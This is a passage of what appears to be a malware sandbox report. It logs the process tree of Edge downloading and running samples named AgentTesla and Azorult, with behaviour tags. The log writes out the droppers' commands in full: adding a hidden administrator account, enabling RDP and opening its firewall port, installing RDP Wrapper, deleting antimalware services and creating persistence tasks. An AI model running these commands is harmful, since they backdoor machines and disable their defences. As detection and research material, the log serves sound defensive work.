- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:2468
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7296 /prefetch:82⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:12⤵PID:4100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:12⤵PID:3804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:12⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:12⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8048 /prefetch:82⤵PID:3708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7868 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5952
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7720 /prefetch:12⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7732 /prefetch:82⤵PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6416 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2348
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
PID:6084 -
C:\Users\Admin\AppData\Local\Temp\is-AL23C.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-AL23C.tmp\butterflyondesktop.tmp" /SL5="$290280,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4500 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:5476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd85⤵PID:1308
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:12⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:12⤵PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:12⤵PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:12⤵PID:2108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6840 /prefetch:82⤵PID:5416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1472
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3696 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵PID:5276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4308 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:576
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:3912
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5196
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2364
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3144
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5816
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2880
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5992
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:5544
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:5772
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2420 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:1276
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:4360
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5872 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2248 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6036
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵PID:2800
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Modifies registry class
PID:488 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:3588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:496
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:5720
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:772
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
PID:800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:1436
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:5836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵PID:1316
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:5212
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:5832
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5712
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:6120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:2024
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:6040
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:6052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:5052
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵PID:4472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:4252
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:5236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
- System Location Discovery: System Language Discovery
PID:3056
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵
- System Location Discovery: System Language Discovery
PID:5880 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:1580
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:3316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:4044
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵
- System Location Discovery: System Language Discovery
PID:5976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5780
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5256
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:5208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:2692
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:4840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:6012
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5248 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1960
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:224
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:5164
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:3588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:5148
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5736
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5384
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2356
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:5940
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Executes dropped EXE
PID:4672 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CE46.tmp\CE47.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1092
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:428 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:5432
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "svchost" /F7⤵
- Indicator Removal: Clear Persistence
PID:1596 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "svchost" /F8⤵
- System Location Discovery: System Language Discovery
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F7⤵
- Indicator Removal: Clear Persistence
PID:4032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\jFvfxe" /F8⤵
- System Location Discovery: System Language Discovery
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F7⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:960 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\jFvfxe" /F8⤵PID:3040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:4120
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:5496
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:5304
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
PID:2964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:6064
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5636
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4616
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
PID:5712
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1436
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3320
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:5532
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:5616
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:2352
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:5316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:2908
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:4336
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:2724
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:792
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:4800
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:5252
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:808
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:5676
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:5344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:1960
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:6004
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:5688
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:2872
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:5608
-
